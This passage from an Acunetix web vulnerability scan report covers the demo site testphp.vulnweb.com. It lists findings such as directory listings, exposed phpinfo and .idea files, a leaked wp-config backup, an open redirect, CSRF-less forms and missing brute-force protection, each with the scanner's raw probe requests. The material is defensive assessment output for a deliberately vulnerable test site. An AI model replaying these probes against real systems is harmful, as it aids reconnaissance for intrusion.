id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> websecurityscan.eu 40

<ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wasp@acunetix.com">Contact Us</a> | &copy;2004 Acunetix Ltd </div> <br> </div> </body> <!-- InstanceEnd --></html> Request headers GET /index.zip HTTP/1.1 Range: bytes=0-99999 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

41

Directory listing
Severity Medium Type Information Reported by module Scripting (Directory_Listing.script) Description The web server is configured to display the list of files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site. Impact A user can view a list of all files from this directory possibly exposing sensitive information. Recommendation You should make sure the directory does not contain sensitive information or you may want to restrict directory listings from the web server configuration. References Directory Listing and Information Disclosure Affected items /.idea Details Pattern found: <title>Index of /.idea/</title> Request headers GET /.idea/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/.idea/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /.idea/scopes Details Pattern found: <title>Index of /.idea/scopes/</title> Request headers GET /.idea/scopes/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/.idea/scopes/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /admin Details Pattern found: <title>Index of /admin/</title> Request headers GET /admin/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/admin/ websecurityscan.eu

42

Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /CVS Details Pattern found: <title>Index of /CVS/</title> Request headers GET /CVS/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/CVS/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Flash Details Pattern found: <title>Index of /Flash/</title> Request headers GET /Flash/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Flash/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /images Details Pattern found: <title>Index of /images/</title> Request headers GET /images/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/images/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Mod_Rewrite_Shop/images Details Pattern found: <title>Index of /Mod_Rewrite_Shop/images/</title> Request headers GET /Mod_Rewrite_Shop/images/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) websecurityscan.eu 43

Accept: */* /pictures Details Pattern found: <title>Index of /pictures/</title> Request headers GET /pictures/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Templates Details Pattern found: <title>Index of /Templates/</title> Request headers GET /Templates/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Templates/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

44

Error message on page


Severity Medium Type Validation Reported by module Scripting (Text_Search_File.script) Description This page contains an error/warning message that may disclose sensitive information.The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages. Impact The error messages may disclose sensitive information. This information can be used to launch further attacks. Recommendation Review the source code for this script. References PHP Runtime Configuration Affected items /pictures/path-disclosure-unix.html Details Pattern found: <b>Warning</b>: Sablotron error on line 1: XML parser error 3: no element found in <b>/usr/local/etc/httpd/htdocs2/destination-ce/destinationce/system/class/xsltTransform.class.php</b> on line <b>70</b><br /> Request headers GET /pictures/path-disclosure-unix.html HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

45

HTML form without CSRF protection


Severity Medium Type Informational Reported by module Crawler Description This alert may be a false positive, manual confirmation is required. Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more information about the affected HTML form. Impact An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. Recommendation Check if this form requires CSRF protection and implement CSRF countermeasures if necessary. Affected items / Details Form name: <empty> Form action: http://testphp.vulnweb.com/search.php?test=query Form method: POST Form inputs: - searchFor [Text] - goButton [Submit] Request headers GET / HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

46

/comment.php Details Form name: fComment Form action: http://testphp.vulnweb.com/comment.php Form method: POST Form inputs: - name [Text] - comment [TextArea] - Submit [Submit] - phpaction [Hidden] Request headers GET /comment.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /guestbook.php Details Form name: faddentry Form action: http://testphp.vulnweb.com/guestbook.php Form method: POST Form inputs: - name [Hidden] - text [TextArea] - submit [Submit] Request headers GET /guestbook.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /hpp (914f51fea3c42cbd541a6953a8b115a4) Details Form name: <empty> Form action: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 Form method: GET Form inputs: - aaaa/ [Submit] Request headers GET /hpp/?pp=12 HTTP/1.1 Pragma: no-cache Cache-Control: no-cache websecurityscan.eu

47

Referer: http://testphp.vulnweb.com/hpp/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /login.php Details Form name: loginform Form action: http://testphp.vulnweb.com/userinfo.php Form method: POST Form inputs: - uname [Text] - pass [Password] Request headers GET /login.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /signup.php Details Form name: form1 Form action: http://testphp.vulnweb.com/secured/newuser.php Form method: POST Form inputs: - uuname [Text] - upass [Password] - upass2 [Password] - urname [Text] - ucc [Text] - uemail [Text] - uphone [Text] - uaddress [TextArea] - signup [Submit] Request headers GET /signup.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

48

Insecure crossdomain.xml file


Severity Medium Type Configuration Reported by module Scripting (Crossdomain_XML.script) Description The browser security model normally prevents web content from one domain from accessing data from another domain. This is commonly known as the "same origin policy". URL policy files grant cross-domain permissions for reading data. They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory of the target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml). When a domain is specified in crossdomain.xml file, the site declares that it is willing to allow the operators of any servers in that domain to obtain any document on the server where the policy file resides. The crossdomain.xml file deployed on this website opens the server to all domains (use of a single asterisk "*" as a pure wildcard is supported) like so: <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> This practice is suitable for public servers, but should not be used for sites located behind a firewall because it could permit access to protected areas. It should not be used for sites that require authentication in the form of passwords or cookies. Sites that use the common practice of authentication based on cookies to access private or user-specific data should be especially careful when using cross-domain policy files. Impact Using an insecure cross-domain policy file could expose your site to various attacks. Recommendation Carefully evaluate which sites will be allowed to make cross-domain calls. Consider network topology and any authentication mechanisms that will be affected by the configuration or implementation of the cross-domain policy. References Cross-domain policy file usage recommendations for Flash Player Cross-domain policy files Affected items Web Server Details The crossdomain.xml file is located at http://testphp.vulnweb.com/crossdomain.xml Request headers GET http://testphp.vulnweb.com/crossdomain.xml HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* Web Server Details The crossdomain.xml file is located at /crossdomain.xml Request headers GET /crossdomain.xml HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

49

JetBrains .idea project directory


Severity Medium Type Validation Reported by module Scripting (JetBrains_Idea_Project_Directory.script) Description The .idea directory contains a set of configuration files (.xml) for your project. These configuration files contain information core to the project itself, such as names and locations of its component modules, compiler settings, etc. If you've defined a data source the file dataSources.ids contains information for connecting to the database and credentials. The workspace.xml file stores personal settings such as placement and positions of your windows, your VCS and History settings, and other data pertaining to the development environment. It also contains a list of changed files and other sensitive information. These files should not be present on a production system. Impact These files may expose sensitive information that may help an malicious user to prepare more advanced attacks. Recommendation Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .idea folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess): <Directory ~ "\.idea"> Order allow,deny Deny from all </Directory>

References Apache Tips & Tricks: Deny access to some folders Affected items / Details workspace.xml project file found at : /.idea/workspace.xml Pattern found: <project version="4"> Request headers GET /.idea/workspace.xml HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

50

PHP errors enabled


Severity Medium Type Configuration Reported by module Scripting (PHPInfo.script) Description The display_errors directive determines whether error messages should be sent to the browser. These messages frequently contain sensitive information about your web application environment, and should never be presented to untrusted sources. display_errors is on by default. Impact Possible information disclosure. Recommendation You can disable display_errors from php.ini or .htaccess. php.ini display_errors = 'off' log_errors = 'on' .htaccess php_flag display_errors off php_flag log_errors on Affected items /secured/phpinfo.php Details This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.php display_errors: On Request headers GET /secured/phpinfo.php HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

51

PHP open_basedir is not set


Severity Medium Type Configuration Reported by module Scripting (PHPInfo.script) Description The open_basedir configuration directive will limit the files that can be opened by PHP to the specified directory-tree. When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to open it. open_basedir is a good protection against remote file inclusion vulnerabilities. For a remote attacker it is not possible to break out of the open_basedir restrictions if he is only able to inject the name of a file to be included. Therefore the number of files he will be able to include with such a local file include vulnerability is limited. Impact Application dependant - possible remote code inclusion. Recommendation You can set open_basedir from php.ini php.ini open_basedir = your_application_directory

Affected items /secured/phpinfo.php Details This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.php open_basedir: no value Request headers GET /secured/phpinfo.php HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

52

PHPinfo page found


Severity Medium Type Validation Reported by module Scripting (PHPInfo.script) Description PHPinfo page has been found in this directory. The PHPinfo page outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment (if compiled as a module), the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. Impact This file may expose sensitive information that may help an malicious user to prepare more advanced attacks. Recommendation Remove the file from production systems. References PHP phpinfo Affected items /secured/phpinfo.php Details phpinfo() page found at : /secured/phpinfo.php Request headers GET /secured/phpinfo.php HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

53

Source code disclosure


Severity Medium Type Validation Reported by module Scripting (Text_Search_File.script) Description Looks like the source code for this script is available. This check is using pattern matching to determine if server side tags are found in the file. In some cases this alert may generate false positives. Impact An attacker can gather sensitive information (database connection strings, application logic) by analyzing the source code. This information can be used to conduct further attacks. Recommendation Remove this file from your website or change its permissions to remove access. References Source Code Disclosure Can Be Exploited On Your Website Affected items

websecurityscan.eu

54

/index.bak Details Pattern found: <?PHP require_once("database_connect.php"); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of WASP Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> websecurityscan.eu 55

<li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wasp@acunetix.com">Contact Us</a> | &copy;2004 Acunetix Ltd </div> <br> </div> </body> <!-- InstanceEnd --></html> Request headers GET /index.bak HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/index.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

56

/pictures/wp-config.bak Details Pattern found: <?php // ** MySQL settings ** // define('DB_NAME', 'wp265as'); // The name of the database define('DB_USER', 'root'); // Your MySQL username define('DB_PASSWORD', ''); // ...and password define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value define('DB_CHARSET', 'utf8'); define('DB_COLLATE', ''); // Change each KEY to a different unique phrase. You won't have to remember the phrases later, // so make them long and complicated. You can visit http://api.wordpress.org/secret-key/1.1/ // to get keys generated for you, or just make something up. Each key should have a different phrase. define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase. define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase. define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase. // You can have multiple installations in one database if you give each a unique prefix $table_prefix = 'wp_'; // Only numbers, letters, and underscores please! // Change this to localize WordPress. A corresponding MO file for the // chosen language must be installed to wp-content/languages. // For example, install de.mo to wp-content/languages and set WPLANG to 'de' // to enable German language support. define ('WPLANG', ''); /* That's all, stop editing! Happy blogging. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); require_once(ABSPATH . 'wp-settings.php'); ?> Request headers GET /pictures/wp-config.bak HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

57

URL redirection
Severity Medium Type Validation Reported by module Scripting (XFS_and_Redir.script) Description This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. Impact A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers. Recommendation Your script should properly sanitize user input. References HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics URL Redirection Security Vulnerability Affected items /redir.php Details URL encoded GET input r was set to http://www.acunetix.tst Request headers GET /redir.php?r=http://www.acunetix.tst HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

58

User credentials are sent in clear text


Severity Medium Type Informational Reported by module Crawler Description User credentials are transmitted over an unencrypted channel. This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users. Impact A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. Recommendation Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS). Affected items /login.php Details Form name: loginform Form action: http://testphp.vulnweb.com/userinfo.php Form method: POST Form inputs: - uname [Text] - pass [Password] Request headers GET /login.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

59

/signup.php Details Form name: form1 Form action: http://testphp.vulnweb.com/secured/newuser.php Form method: POST Form inputs: - uuname [Text] - upass [Password] - upass2 [Password] - urname [Text] - ucc [Text] - uemail [Text] - uphone [Text] - uaddress [TextArea] - signup [Submit] Request headers GET /signup.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

60

WS_FTP log file found


Severity Medium Type Validation Reported by module Scripting (WS_FTP_log_file.script) Description WS_FTP is a popular FTP client. This application creates a log file named WS_FTP.LOG. This file contains sensitive data such as file source/destination and file name, date/time of upload etc. Impact This file may expose sensitive information that may help an malicious user to prepare more advanced attacks. Recommendation Remove this file from your website or change its permissions to remove access. References ws_ftp.log Affected items /pictures//WS_FTP.LOG Details Pattern found: 103.05.06 13:17 Request headers GET /pictures//WS_FTP.LOG HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

61

Clickjacking: X-Frame-Options header missing


Severity Low Type Configuration Reported by module Scripting (Clickjacking_X_Frame_Options.script) Description Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. Impact The impact depends on the affected web application. Recommendation Configure your web server to include an X-Frame-Options header. Consult Web references for more information about the possible values for this header. References Clickjacking Original Clickjacking paper The X-Frame-Options response header Affected items Web Server Details No details are available. Request headers GET / HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

62

Hidden form input named price was found


Severity Low Type Informational Reported by module Crawler Description A hidden form input named price was found. It's not recommended to hide sensitive information in hidden form fields. Impact User may change price information before submitting the form. Recommendation Check if the script inputs are properly validated. Affected items /product.php (21bc3e21f408d9fb4afa8f6848e81f57) Details Form name: f_addcart Form action: http://testphp.vulnweb.com/cart.php Form method: POST Form inputs: - price [Hidden] - addcart [Hidden] Request headers GET /product.php?pic=2 HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/search.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

63

Login page password-guessing attack


Severity Low Type Validation Reported by module Scripting (Html_Authentication_Audit.script) Description A common threat web developers face is a password-guessing attack known as a brute force attack. A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works. This login page doesn't have any protection against password-guessing attacks (brute force attacks). It's recommended to implement some type of account lockout after a defined number of incorrect password attempts. Consult Web references for more information about fixing this problem. Impact An attacker may attempt to discover a weak password by systematically trying every possible combination of letters, numbers, and symbols until it discovers the one correct combination that works. Recommendation It's recommended to implement some type of account lockout after a defined number of incorrect password attempts. References Blocking Brute Force Attacks Affected items /userinfo.php Details The scanner tested 10 invalid credentials and no account lockout was detected. Request headers POST /userinfo.php HTTP/1.1 Content-Length: 28 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* pass=DauQfld4&uname=1xEv7vXg

websecurityscan.eu

64

Possible sensitive directories


Severity Low Type Validation Reported by module Scripting (Possible_Sensitive_Directories.script) Description A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks for common sensitive resources like backup directories, database dumps, administration pages, temporary directories. Each one of these directories could help an attacker to learn more about his target. Impact This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks. Recommendation Restrict access to this directory or remove it from the website. References Web Server Security and Database Server Security Affected items /admin Details No details are available. Request headers GET /admin HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) /CVS Details No details are available. Request headers GET /CVS HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) /secured Details No details are available. Request headers GET /secured HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

websecurityscan.eu

65

Possible sensitive files


Severity Low Type Validation Reported by module Scripting (Possible_Sensitive_Files.script) Description A possible sensitive file has been found. This file is not directly linked from the website. This check looks for common sensitive resources like password files, configuration files, log files, include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target. Impact This file may expose sensitive information that could help a malicious user to prepare more advanced attacks. Recommendation Restrict access to this file or remove it from the website. References Web Server Security and Database Server Security Affected items /hpp/test.php Details No details are available. Request headers GET /hpp/test.php HTTP/1.1 Accept: acunetix/wvs Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) /Mod_Rewrite_Shop/.htaccess Details No details are available. Request headers GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1 Accept: acunetix/wvs Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

websecurityscan.eu

66

Possible virtual host found


Severity Low Type Configuration Reported by module Scripting (VirtualHost_Audit.script) Description Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers). This allows one server to share its resources, such as memory and processor cycles, without requiring all services provided to use the same host name. This web server is responding differently when the Host header is manipulated and various common virtual hosts are tested. This could indicate there is a Virtual Host present. Impact Possible sensitive information disclosure. Recommendation Consult the virtual host configuration and check if this virtual host should be publicly accessible. References Virtual hosting Affected items localhost Details VirtualHost: localhost Response: <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br/> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html> Request headers GET / HTTP/1.0 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

websecurityscan.eu

67

Broken links
